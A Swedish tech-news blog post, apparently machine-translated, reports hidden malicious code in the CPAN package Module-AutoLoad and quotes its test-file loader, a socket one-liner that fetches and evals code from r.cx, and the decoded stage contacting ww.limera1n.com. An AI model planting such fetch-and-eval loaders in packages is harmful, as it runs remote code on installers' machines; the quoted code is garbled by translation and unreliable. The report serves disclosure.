ProHoster > blogg > internetnyheter > Skadlig kod hittades i Module-AutoLoad Perl-paketet

Skadlig kod hittades i Module-AutoLoad Perl-paketet

I ett Perl-paket distribuerat via CPAN-katalogen Modul-AutoLoad, designad för att automatiskt ladda CPAN-moduler i farten, identifieras skadlig kod. Den skadliga infogningen var hittades i testkoden 05_rcx.t, som har levererats sedan 2011.
Det är anmärkningsvärt att frågor om att ladda tvivelaktig kod uppstod på Stackoverflow tillbaka 2016.

Skadlig aktivitet kokar ner till ett försök att ladda ner och exekvera kod från en tredjepartsserver (http://r.cx:1/) under körningen av en testsvit som startades när modulen installerades. Det antas att koden som ursprungligen laddades ner från den externa servern inte var skadlig, men nu omdirigeras begäran till domänen ww.limera1n.com, som tillhandahåller sin del av koden för exekvering.

För att organisera nedladdningen i en fil 05_rcx.t Följande kod används:

min $prog = __FIL__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
min $försök = `$^X $prog`;

Den angivna koden gör att skriptet exekveras ../contrib/RCX.pl, vars innehåll reduceras till raden:

använd lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Det här skriptet laddas förvirrad använder tjänsten perlobfuscator.com kod från den externa värden r.cx (teckenkoder 82.46.99.88 motsvarar texten "R.cX") och exekverar den i eval-blocket.

$ perl -MIO::Socket -e'$b=ny IO::Socket::INET 82.46.99.88.":1″; skriv ut <$b>;'
eval packa upp u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Efter uppackning utförs till slut följande: код:

print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1

Det problematiska paketet har nu tagits bort från förvaret. PAUS (Perl Authors Upload Server), och modulförfattarens konto är blockerat. I det här fallet finns modulen fortfarande kvar tillgängliga i MetaCPAN-arkivet och kan installeras direkt från MetaCPAN med hjälp av vissa verktyg som cpanminus. Det är noteratatt paketet inte fick stor spridning.

Intressant att diskutera ansluten och författaren till modulen, som förnekade informationen om att skadlig kod infogades efter att hans sida "r.cx" hackats och förklarade att han bara hade roligt och använde perlobfuscator.com inte för att dölja något, utan för att minska storleken av koden och förenkla dess kopiering via urklipp. Valet av funktionsnamnet "botstrap" förklaras av det faktum att detta ord "låter som bot och är kortare än bootstrap." Författaren till modulen försäkrade också att de identifierade manipulationerna inte utför skadliga åtgärder, utan endast visar laddning och exekvering av kod via TCP.

Källa: opennet.ru

Lägg en kommentar